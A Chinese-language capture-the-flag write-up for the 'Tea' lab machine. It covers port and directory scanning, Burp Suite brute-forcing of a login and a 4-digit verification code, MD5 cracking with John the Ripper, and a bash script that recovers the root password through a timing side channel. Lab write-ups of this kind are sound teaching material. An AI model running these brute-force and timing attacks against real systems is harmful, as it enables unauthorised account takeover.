Tea靶场学习笔记

正文

kali攻击机地址:192.168.1.13

靶场地址:192.168.1.205

1、端口扫描

在kali里,使用nmap工具:

bash 复制代码
nmap -sV -v -T4 -A 192.168.1.205

可以看到22和80端口是开放的。

2、目录扫描

bash 复制代码
dirsearch -u http://192.168.1.205

访问网页http://192.168.1.205/login.php

3、网页用户名密码爆破

尝试用户名为admin,密码用brupsuit单点爆破:

登录进去发现4个用户,下面有个邮箱的提示:

那我们就退出登录,重新邮箱登录,选择使用验证码登录,然后用Brupsuit对验证码4位数字爆破,发现用户名lingmj@tea.dsz、验证码8379是可行的:

进去之后,发现给了三个用户和密码的哈希值:

4、John the Ripper工具hash密码爆破

使用 John the Ripper工具,对这些密码hash值进行爆破:

bash 复制代码
john tmp --wordlist=user11.txt --format=raw-md5
  • john:调用 John the Ripper 工具

  • tmp:要破解的哈希文件(里面存着 MD5 哈希值)

  • --wordlist=user11.txt:使用 user11.txt 字典进行字典攻击

  • --format=md5:指定要破解的哈希类型是 MD5

    破解出来Flower用户的密码是Cartman
    通过命令john user11.txt --show --format=raw-md5可以看到破解出来的结果:

  • user11.txt:你要查看结果的哈希文件(必须写)

  • --show:告诉 John 显示已破解的密码

  • --format=raw-md5:指定哈希类型,避免识别错误

    Red:123bugme
    Flower:Cartman

ssh连接后,拿到user.txt:

5、脚本破解check_root_passwd

进入/opt目录下,可以看到check_root_passwd文件,但是当前red用户没有权限读取:

经过手动测试,在输入长度为10位的时候check_root_passwd文件会有一个明显的停顿,可以用以下1.sh脚本来测试:

bash 复制代码
#!/bin/bash
start_time_ns=$(date +%s%N)
output=$(/opt/check_root_passwd "$1")
end_time_ns=$(date +%s%N)
elapsed_ns=$((end_time_ns - start_time_ns))
elapsed_sec=$(awk -v ns="$elapsed_ns" 'BEGIN { printf "%.6f", ns / 1000000000 }')
echo "Output: $output"
echo "Time elapsed: $elapsed_sec seconds"

输入命令:

bash 复制代码
bash 1.sh 1234567890

那就编写一个破解10位数密码的2.sh脚本:

bash 复制代码
#!/bin/bash

# 1. 定义字符集:密码可能包含的所有字符(数字+小写字母+大写字母)
charset="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# 2. 初始化变量 known,用来保存已经猜对的密码前缀(一开始是空)
known=""

# 3. 外层循环:控制密码的长度(从第1位到第10位,共10位)
for ((i=1; i<=10; i++)); do
    # 4. 初始化当前位的最佳字符和最长耗时
    best_char=""   # 用来存当前位"耗时最长"的字符(就是正确字符)
    max_time=0     # 用来存当前位所有测试中的最长耗时(初始为0)

    # 5. 内层循环:遍历字符集中的每一个字符,逐个测试
    # echo "$charset" | fold -w1:把字符集拆成单个字符(比如把abc拆成a、b、c)
    for c in $(echo "$charset" | fold -w1); do
        # 6. 构造测试用的密码 attempt
        # 格式:已知前缀 + 当前测试字符 + 补全剩余位数为'a'(凑够10位)
        attempt="$known$c$(head -c $((10 - i)) </dev/zero | tr '\0' 'a')"

        # 7. 记录程序运行前的开始时间(纳秒级,保证高精度)
        start=$(date +%s%N)

        # 8. 运行密码校验程序,传入测试密码,输出重定向到 /dev/null(不显示结果)
        /opt/check_root_passwd "$attempt" > /dev/null

        # 9. 记录程序运行后的结束时间
        end=$(date +%s%N)

        # 10. 计算程序运行的耗时(纳秒)
        elapsed=$((end - start))

        # 11. 判断当前字符的耗时是否是目前最长的
        if (( elapsed > max_time )); then
            max_time=$elapsed  # 更新最长耗时
            best_char=$c       # 更新当前位的最佳字符(正确字符)
        fi
    done  # 内层字符循环结束

    # 12. 把当前位的正确字符拼接到已知密码里
    known+=$best_char

    # 13. 打印当前爆破进度(方便看猜了多少位)
    echo "[$i] -> $known (time: $max_time ns)"
done  # 外层位数循环结束

通过以下命令:

bash 复制代码
vim 2.sh
chmod +x 2.sh
./2.sh

拿到root用户的密码toddzhennb

成功进入root用户目录下:

相关推荐
辣香牛肉面13 小时前
CintaNotes个人笔记管理软件v3.14(v3.13.0 绿色汉化版)
笔记
solicitous13 小时前
学习了解充电桩协议OCPP——J规范
学习
H__Rick15 小时前
C51单片机学习-DAY3
单片机·学习·mongodb
yoothey15 小时前
异常学习笔记:为什么自定义异常后还要 throw?
笔记·学习
sulikey16 小时前
数据库系统概论4 - 更新与视图 期末速成课笔记
数据库·笔记·考试·期末速成·数据库系统概论
WangN216 小时前
【通识】宇树G1_29DOF速度跟踪训练—逐章学习手册
人工智能·python·学习·机器人·具身智能
لا معنى له17 小时前
NeoVerse: Enhancing 4D World Model with in-the-wild Monocular Videos
人工智能·笔记·机器学习·语言模型
黄毛火烧雪下17 小时前
Java 基础笔记:文件、递归与字符编码
java·开发语言·笔记
学计算机的计算基17 小时前
链表算法上篇:LeetCode 206/234/141/142/160/21 题解与易错点
java·笔记·算法·链表
lazy H17 小时前
Spring Boot 项目如何连接 Redis?新手入门配置和常见错误总结
ide·spring boot·redis·后端·学习·intellij-idea